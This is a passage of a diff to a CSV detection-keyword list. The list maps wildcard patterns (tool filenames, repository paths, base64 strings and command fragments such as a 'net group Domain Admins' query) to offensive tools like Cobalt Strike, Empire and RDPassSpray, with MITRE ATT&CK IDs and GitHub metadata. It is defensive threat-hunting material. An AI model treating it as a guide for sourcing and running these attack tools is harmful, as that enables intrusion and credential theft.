adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1131","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*wscript_elevator*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*WScriptBypassUAC*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1131","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*wsl kali-linux*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","wsl execution","N/A","N/A","N/A","N/A","N/A","N/A" -"*WSPCoerce.ex*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","202","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" -"*WSPCoerce-main*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","202","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" +"*WSPCoerce.ex*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" +"*WSPCoerce-main*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" "*WSUSpendu*","offensive_tool_keyword","WSUSpendu","At BlackHat USA 2015. the WSUSpect attack scenario has been released.Approximately at the same time. some french engineers have been wondering if it would be possible to use a compromised WSUS server to extend the compromise to its clients. similarly to this WSUSpect attack. After letting this topic rest for almost two years. we've been able. at Alsid and ANSSI. to demonstrate this attack.","T1563 - T1204 - T1210 - T1071","TA0001 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AlsidOfficial/WSUSpendu","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wsuxploit*","offensive_tool_keyword","wsuxploit","This is a MiTM weaponized exploit script to inject 'fake' updates into non-SSL WSUS traffic. It is based on the WSUSpect Proxy application that was introduced to public on the Black Hat USA 2015 presentation. 'WSUSpect Compromising the Windows Enterprise via Windows Update","T1557.001 - T1557.002 - T1573 - T1210.001","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/pimps/wsuxploit","1","1","N/A","N/A","3","267","50","2022-11-25T10:04:15Z","2017-06-30T01:06:41Z" "*wts_enum_remote_processes*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","104","12","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z" @@ -18490,37 +18678,37 @@ "*www.kali.org/get-kali/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*www.securityfocus.com/archive/1/514379*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*www.vsecurity.com/download/tools/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*www.wfuzz.org*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*wxfuzz.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*wxfuzz.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*www.wfuzz.org*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wxfuzz.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wxfuzz.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*WypdIENhbid0IENvbm5lY3QgQWxpeXVuIEJ1Y2tldC4=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*WypdIFRoZSBCdWNrZXQgb3IgUmVmbGVjdGl2ZSBETEwgVVJJIGlzIEVtcHR5Lg==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*WytdIEluamVjdGVkIHRoZSA=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" -"*-x *net group *Domain Admins* /domain*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*-x *net group *Domain Admins* /domain*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" "*X32_ClSp_Tcp_Exe.exe*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" "*X64_ClSp_Tcp_Exe.exe*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" "*x64PELoader/*.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*x64win-DynamicNoNull-WinExec-PopCalc-Shellcode*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","","","" -"*x86_64-unknown-uefi*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","448","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*x86_64-unknown-uefi*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*x86PELoader/*.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*x86PELoader/test_agent_dll*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*x86PELoader/test_agent_exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*x86PELoader/test_proxy_dll*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*x86PELoader/test_proxy_exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*x90skysn3k*","offensive_tool_keyword","Github Username","Github username known for password exploitation and offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/x90skysn3k","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*xato-net-10-million-usernames.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*xato-net-10-million-usernames.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*X-C2-Beacon*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*xcopy /y /d *\msquic_schannel\msquic.dll*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","0","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*xforcered/CredBandit*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*xforcered/Detect-Hooks*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/Detect-Hooks","1","1","N/A","10","10","91","6","2021-07-22T20:13:16Z","2021-07-23T16:10:37Z" -"*xforwardedfor.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*xforwardedfor.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*xFreed0m/RDPassSpray*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*xfreerdp /v*SOCtest*AllLegitHere*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","0","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*xfrm_poc*lucky0*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*xillwillx*","offensive_tool_keyword","Github Username","github repo username hosting red team tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/xillwillx","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*XiphosResearch*","offensive_tool_keyword","exploits","Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes.","T1203 - T1068 - T1062 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/XiphosResearch/exploits","1","0","N/A","N/A","10","1433","606","2023-07-20T10:15:01Z","2015-03-05T11:15:07Z" -"*x-ishavocframework*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*xmendez/wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*x-ishavocframework*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*xmendez/wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - 